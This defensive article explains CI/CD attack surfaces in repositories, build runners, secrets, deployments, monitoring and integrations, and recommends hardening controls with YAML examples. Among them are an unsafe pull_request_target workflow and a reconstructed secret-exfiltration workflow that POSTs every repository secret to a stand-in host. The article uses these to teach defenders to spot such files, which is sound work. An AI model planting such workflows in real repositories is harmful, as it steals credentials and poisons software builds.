Where DevOps Pipelines Break: Real Attack Paths in Cloud-Native CI/CD
CI/CD pipelines sit at the center of how modern software is built and shipped. Source code, cryptographic keys, build artifacts and deployment credentials are all concentrated in a single automated flow, which makes these systems high-value targets.
Unlike a misconfigured S3 bucket or an unpatched container image, a compromised pipeline does not just expose data; it compromises the artifact itself. Every build produced after the breach can include attacker-controlled code, automatically and at scale.
The SolarWinds incident made this viscerally clear. Attackers didn’t breach the firewall. They waited inside the build system, modified source files immediately before compilation and let the resulting backdoored binary flow through normal software distribution channels. Microsoft, FireEye and dozens of government agencies received a backdoor through an update they trusted.
Most attacks don’t reach SolarWinds-level sophistication, but the underlying principle is the same: Automated trust is the attack surface in most modern pipeline breaches.
Modern DevOps environments aren’t monolithic. They’re ecosystems of integrations: Code repositories, build servers, secret managers, artifact registries, deployment targets, monitoring stacks, notification webhooks and cloud APIs. Each connection is a trust relationship. Each trust relationship is a potential entry point.
DevOps tooling is designed to make integration frictionless. The same friction reduction that speeds up deployment cycles also smooths the path for lateral movement once something is compromised.
Security teams usually audit visible layers such as network perimeters, endpoint agents and access controls. Pipeline topology is harder to map and even harder to reason about from a threat perspective. A webhook that triggers a build job when a PR is merged looks mundane in isolation. Trace it through to its downstream permissions and it might have write access to a production Kubernetes namespace.
Six Primary Attack Surfaces in CI/CD Pipelines
1. Code Repositories
The repository is where pipeline control lives. .gitlab-ci.yml, Jenkinsfile and GitHub Actions workflows define execution logic and permissions. Write access to a repository, or a misconfigured pull_request_target workflow that accepts fork pull requests, can lead directly to code execution with access to repository secrets.
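A minimal illustration of the risky `pull_request_target` pattern may help (workflow and secret names are hypothetical): the trigger runs in the base repository’s privileged context, yet the job checks out and executes code from the untrusted fork.

```yaml
# Hypothetical example of a DANGEROUS pattern — shown to be recognized, not copied.
name: ci
on: pull_request_target        # runs with the base repo's permissions and secrets
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Checks out the UNTRUSTED fork branch into the privileged context...
          ref: ${{ github.event.pull_request.head.sha }}
      # ...then runs its install scripts and tests with a secret in scope.
      - run: npm install && npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}    # hypothetical secret name
```

An attacker only needs to open a fork pull request whose `package.json` scripts read `NPM_TOKEN` from the environment; the maintainer never has to merge anything.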
Attackers abuse this in two ways. First, direct modification: Alter a pipeline definition to exfiltrate secrets during the next build run. Second, dependency poisoning: Introduce a malicious package that the pipeline automatically pulls. The npm ecosystem has seen this repeatedly: a phishing attack that compromised maintainer credentials for packages with billions of weekly downloads showed how a single account takeover can cascade through hundreds of dependent pipelines.
What makes repository attacks particularly dangerous in cloud-native environments is the blast radius. A GitHub Actions workflow with permissions to push container images, update Kubernetes manifests or rotate AWS credentials is an execution primitive with production-level reach.
2. Build Servers
Jenkins, GitLab CI and GitHub Actions runners execute arbitrary code by design. That’s the point. The security model depends entirely on controlling what gets executed and ensuring that the execution environment itself isn’t compromised.
Both assumptions break more often than expected. Outdated plugins are a chronic problem in self-hosted Jenkins installations; the CVE history for Jenkins plugins is long and unglamorous. Misconfigured agent permissions allow one pipeline to read secrets scoped to another. Shared build runners, especially in environments with weak isolation, allow a malicious job to observe or interfere with concurrent builds from other projects.
In Kubernetes-native CI environments, build pods with overly broad service account permissions create direct paths from a compromised build step to cluster-level operations. A pod with overly permissive RBAC can create other pods, modify ConfigMaps or access the Kubernetes API beyond its intended scope.
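The mitigation is to give build pods a narrowly scoped, namespace-bound identity. A sketch of a minimal Role and RoleBinding, with names, namespace and the exact resource list as illustrative assumptions:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: build-minimal            # hypothetical name
  namespace: ci                  # hypothetical build namespace
rules:
  # Read-only access to the ConfigMaps a typical build consumes —
  # no pod creation, no write verbs, no access to Secrets.
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: build-minimal
  namespace: ci
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: build-minimal
subjects:
  - kind: ServiceAccount
    name: build-runner           # hypothetical build service account
    namespace: ci
```

A Role (rather than a ClusterRole) keeps the grant confined to the namespace, so even a fully compromised build step cannot reach the cluster-level operations described above.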
Attackers also abuse the execution model itself. Malicious dependencies can run automatically during installation before most pipeline controls or scanning stages apply. The Shai-Hulud npm worm followed this pattern, executing during dependency installation and using automated techniques to extract credentials from build environments. Since this code runs as part of the build process, it inherits the pipeline’s permissions and access, allowing it to propagate across CI/CD systems without requiring direct modification of repository code.
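One common hedge against install-time execution is to skip lifecycle scripts during dependency installation. A sketch as a CI step, assuming an npm-based build:

```yaml
steps:
  - name: Install dependencies without lifecycle scripts
    # --ignore-scripts prevents preinstall/postinstall hooks from running,
    # which is where install-time malware like Shai-Hulud gains its foothold.
    run: npm ci --ignore-scripts
```

The trade-off is that legitimate postinstall steps, such as native module builds, must then be invoked explicitly for packages the team has vetted.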
3. Secret Management
Secrets leak into pipelines through neglect, convenience and misconfiguration. Environment variables appear in build logs when masking is misconfigured or bypassed; API keys are hardcoded in pipeline YAML and pushed to repositories; OAuth tokens are issued with overly broad scope and no expiration; Docker registry credentials are embedded in Kubernetes manifests and committed to version control.
The GhostAction campaign, documented by GitGuardian in 2025, illustrates the scale this can reach. Attackers distributed pull requests disguised as security improvements across GitHub repositories. Each PR contained a hidden workflow that, when merged, exfiltrated secrets via HTTP POST to an attacker-controlled endpoint. The campaign compromised 327 GitHub users, 817 repositories and 3,325 secrets, including PyPI tokens, npm publish credentials and DockerHub authentication.
The attack succeeded not because of a zero-day exploit, but because secrets were accessible to workflow contexts that shouldn’t have needed them.
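The hidden-workflow pattern is worth recognizing on sight. A condensed, hypothetical reconstruction of what such a file looks like (the workflow name and endpoint are invented):

```yaml
# Illustrative reconstruction of a secret-exfiltration workflow — the kind of
# file a malicious PR buries under .github/workflows/. Endpoint is fictional.
name: security-check             # innocuous-sounding name chosen by the attacker
on: push
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - run: |
          # Serializes every repository secret and POSTs it out.
          curl -s -X POST -d "$ALL_SECRETS" https://collector.invalid/upload
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
```

The `toJSON(secrets)` expression is the tell: there is almost no legitimate reason for a workflow to serialize the entire secrets context into an environment variable.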
The cloud-native secret management stack has strong solutions for this: Kubernetes Secrets with encryption at rest enabled, HashiCorp Vault or AWS Secrets Manager for dynamic or short-lived credentials and IRSA or Workload Identity for cloud API access without long-lived static keys. The gap between having these tools available and using them consistently across pipelines is where most real-world exposures occur.
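For the IRSA piece, the binding is a single annotation on the build pod’s service account; the names and role ARN below are placeholders:

```yaml
apiVersion: v1
kind: ServiceAccount
metadata:
  name: build-runner                   # hypothetical service account
  namespace: ci                        # hypothetical build namespace
  annotations:
    # EKS injects short-lived credentials for this IAM role into pods that
    # use this service account — no static AWS keys stored in CI variables.
    eks.amazonaws.com/role-arn: arn:aws:iam::111122223333:role/ci-build   # placeholder ARN
```

Because the credentials are minted per pod and expire, a leaked build log or dumped environment yields far less than a long-lived access key would.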
4. Deployment Environments
Artifacts built in CI must be deployed somewhere. That step often involves pushing container images or applying Kubernetes manifests and requires credentials and permissions that, if misconfigured, become prime targets.
The threat model here shifts from “can we compromise the build?” to “what happens if the artifact itself is malicious?” Insufficient image signing and verification means a compromised registry push can go undetected. Missing admission policies or image validation controls in Kubernetes clusters allow pods to run unverified or substituted images. Inadequate environment segmentation means a build that targets staging can, through misconfigured permissions, also reach production.
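A sketch of an admission-level control, assuming Kyverno is the policy engine: a ClusterPolicy that rejects pods whose images are not signed by a known key. The registry pattern and key are placeholders.

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-signed-images          # hypothetical policy name
spec:
  validationFailureAction: Enforce     # block, don't just audit
  rules:
    - name: verify-image-signature
      match:
        any:
          - resources:
              kinds: ["Pod"]
      verifyImages:
        - imageReferences:
            - "registry.example.com/*"     # placeholder registry pattern
          attestors:
            - entries:
                - keys:
                    publicKeys: |-
                      -----BEGIN PUBLIC KEY-----
                      <cosign public key here>
                      -----END PUBLIC KEY-----
```

With a policy like this enforced at admission, a substituted or unsigned image is rejected at the cluster boundary even if it slipped past every earlier pipeline stage.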
Attacks at this stage are particularly dangerous because they can bypass earlier quality controls and security scanning in the pipeline. An attacker who controls artifact delivery does not need to break past SAST scanners and can inject after them.
5. Monitoring and Logging Systems
Monitoring is the last place most teams think of as an attack target. It’s also where attackers go to cover their tracks and map infrastructure.
A compromised logging pipeline can weaken detection and complicate the investigation of malicious activity. Access to monitoring data can expose deployment schedules, service topology, environment variable usage patterns and operational rhythms that inform subsequent attacks. In Kubernetes environments, access to cluster metrics and pod logs can reveal insights into application behavior and secrets handling.
6. External Integrations and APIs
Every webhook, API key and cloud provider integration in a DevOps environment represents a trust boundary. Examples include Slack integrations that post deployment notifications, PagerDuty webhooks for incident creation, Datadog API keys for metrics ingestion and cloud provider credentials for infrastructure provisioning.
Most of these integrations receive more permissions than they need, because scoping down permissions requires effort and they are often configured under time pressure. In cloud-native architectures where dozens of services interact through APIs, the cumulative attack surface of under-scoped integrations is substantial.
Compromising a webhook endpoint or a cloud API key in this layer does not require touching source code or build infrastructure. It’s an indirect access path that often gets overlooked because it doesn’t resemble a traditional security boundary.
How Attackers Dig In After Initial Access
Getting initial access is one problem. Maintaining it without detection is another. In CI/CD environments, attackers use persistence techniques designed to survive routine security actions such as password rotations and repository audits.
Pipeline script modification is one of the most direct persistence paths. Altering a CI configuration file to add secret exfiltration, an outbound HTTP request or a malicious binary download allows the attack to execute with every build. If the change is subtle, for example, a single line in a large Jenkinsfile, it can persist for months without detection.
Environment variable hijacking targets credentials that exist only during a build run. These values do not appear in static code analysis. An attacker who can access build logs or inject a step that dumps environment variables can capture valid credentials without leaving persistent artifacts in the repository.
Malicious dependency injection operates on a longer timescale. By substituting or modifying a library that the pipeline automatically pulls, through a compromised package registry, cache poisoning or dependency confusion, attackers ensure that every build reintroduces the malicious code. Removing the initial access doesn’t resolve the issue if the compromised dependency remains in use.
Fake artifact publication extends the attack further. By publishing modified packages or container images to registries that other pipelines consume, attackers create a distribution path that operates through trusted channels. The initial breach becomes persistent supply chain contamination.
All of these persistence mechanisms share a common trait: They exploit the automated trust CI/CD systems depend on. Pipelines trust configuration, dependency resolvers trust registries and deployment systems trust artifacts. Without strong verification, attackers can operate within these trust paths indefinitely.
Practical Security Controls for CI/CD Pipelines
Below is a prioritized set of controls that address common weaknesses. Implementation should happen within a DevSecOps culture, where security is integrated at each pipeline stage and shared between development and security teams rather than added at the end.
1. Access Control and Privilege Scoping
Apply least privilege to every identity that interacts with the pipeline, including users, service accounts, build agents and deployment systems. CI/CD environments tend to accumulate permissions over time, so an agent that previously required broad access may still retain it. Regular audits of effective permissions help identify and remove this drift before it is exploited. Enforce MFA for repository access, centralize identity management where possible and monitor for anomalous activity such as off-hours secret access or unusual API usage.
2. Secret Life Cycle Management
Centralize secret storage in a dedicated system such as AWS Secrets Manager or Azure Key Vault. Enforce rotation and expiration. Mask secret values in logs and UI outputs. Use dynamic, short-lived credentials where supported, such as AWS IRSA, GCP Workload Identity Federation or Azure Managed Identity, instead of long-lived static keys. Isolate secret stores between environments so staging pipelines never have access to production credentials, even in read-only form.
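On GitHub Actions, the short-lived-credential pattern looks roughly like this (the role ARN is a placeholder): the job exchanges an OIDC token for temporary AWS credentials instead of reading a static key from a secret.

```yaml
permissions:
  id-token: write      # allows the job to request an OIDC token from GitHub
  contents: read
steps:
  - uses: aws-actions/configure-aws-credentials@v4
    with:
      role-to-assume: arn:aws:iam::111122223333:role/deploy-staging   # placeholder ARN
      aws-region: us-east-1
```

The IAM role’s trust policy can further restrict which repository and branch may assume it, so a stolen workflow file in another repo gains nothing.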
3. Code and Dependency Verification
Integrate static analysis (SAST), dynamic testing (DAST), software composition analysis (SCA) and supply chain scanning directly into pipeline execution as blocking gates, not optional checks. Maintain a software bill of materials (SBOM) for every artifact. Verify package integrity using cryptographic hashes or signed packages where supported. Pin dependency versions and avoid resolving to latest in production builds.
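Pinning applies to the pipeline’s own building blocks as well as application dependencies. A hedged sketch of both in one workflow fragment (the SHA is a placeholder to be resolved from the action’s repository):

```yaml
steps:
  # Pin third-party actions to a full commit SHA, not a mutable tag —
  # a tag can be moved to point at malicious code after review.
  - uses: actions/checkout@<full-commit-sha>   # placeholder; pin the real SHA
  # For application dependencies, install strictly from the lockfile;
  # `npm ci` fails if package.json and package-lock.json disagree.
  - run: npm ci
```

The same idea extends to container base images, which can be referenced by digest (`image@sha256:…`) rather than by tag.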
4. Pipeline Observability and Anomaly Detection
Centralize logging across all pipeline components. Alert on anomalous patterns such as unexpected outbound network calls from build agents, secret access from unusual IP addresses, changes to workflow files in repositories that rarely modify CI configuration and artifact size changes without corresponding code updates. In Kubernetes environments, enable API server audit logging and monitor for potential privilege escalation.
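For the Kubernetes piece, a minimal audit policy fragment that records who reads Secrets; a sketch only, since production policies typically carry many more rules:

```yaml
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log metadata (who, when, which object) for every Secret access,
  # without recording the secret values themselves.
  - level: Metadata
    resources:
      - group: ""
        resources: ["secrets"]
  # Keep noise down: ignore routine read-only calls to other resources.
  - level: None
    verbs: ["get", "list", "watch"]
```

Secret reads from a build service account outside normal pipeline hours are exactly the kind of anomaly this log makes visible.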
5. Environment Isolation and Segmentation
Build, test, staging and production environments should be isolated at both the network and identity layers. Build agents should not have direct network access to production systems. Deployment credentials must be scoped to the target environment. In Kubernetes, use namespace-scoped service accounts, network policies and admission controllers such as Open Policy Agent or Kyverno to enforce these boundaries at the infrastructure level rather than relying on process discipline.
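One way to enforce the network side of this is a restrictive egress NetworkPolicy on the build namespace, with only explicit allowances (namespace name and labels are assumptions):

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: build-egress-restricted    # hypothetical name
  namespace: ci                    # hypothetical build namespace
spec:
  podSelector: {}                  # applies to every pod in the namespace
  policyTypes: ["Egress"]
  egress:
    # Allow DNS so builds can still resolve registries and mirrors.
    - ports:
        - protocol: UDP
          port: 53
    # Allow traffic to the internal artifact registry namespace only;
    # nothing here permits reaching production namespaces.
    - to:
        - namespaceSelector:
            matchLabels:
              app.kubernetes.io/name: registry   # placeholder label
```

Because any egress rule on a pod switches it to default-deny for everything unlisted, production endpoints become unreachable from build pods at the infrastructure level.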
6. Security Automation in Pipelines
Security checks should run automatically on every pipeline execution without manual triggers. Run SAST on every pull request, SCA on each dependency update, container image scanning before every registry push and Kubernetes manifest validation before deployment. The goal is to make the secure path the default, so software engineers are not forced to choose between speed and safety.
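A sketch of a blocking image-scan gate, assuming the Trivy CLI is available on the runner (the image reference is a placeholder):

```yaml
steps:
  - name: Scan image before push
    # --exit-code 1 turns findings into a build failure, making the
    # scan a blocking gate rather than an advisory report.
    run: trivy image --exit-code 1 --severity HIGH,CRITICAL registry.example.com/app:${GITHUB_SHA}
```

Running the scan before the registry push, not after, is what keeps a vulnerable image from ever becoming a consumable artifact.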
7. Team Training Based on Real Attack Patterns
Security training that focuses only on phishing and password hygiene does not prepare developers for the threats their pipelines face. Scenarios such as npm token theft, GitHub Actions workflow injection via malicious pull requests and environment variable exfiltration are patterns developers need to recognize. Training should be concrete, technical and aligned with the tools and workflows the team actually uses.
Final Thoughts: The Core Challenge
Attacker interest in CI/CD infrastructure is driven by exceptional return on investment. Control over a build pipeline means control over everything downstream, including source code, credentials, infrastructure and ultimately the software that users trust.
The challenge is not a lack of tooling. The controls described above are achievable with existing technology. The harder problem is ensuring sustained ownership across a boundary that many organizations still treat as belonging to neither security nor development teams.
DevSecOps addresses this by making security a shared property of the pipeline rather than an external gate. Embedding verification at each stage, enforcing policy violations as build failures and treating the pipeline as an attack surface to be hardened shifts organizations from reactive response to structural resilience.
The pipelines that deliver production software require the same level of security rigor as the software itself. In practice, they often receive far less.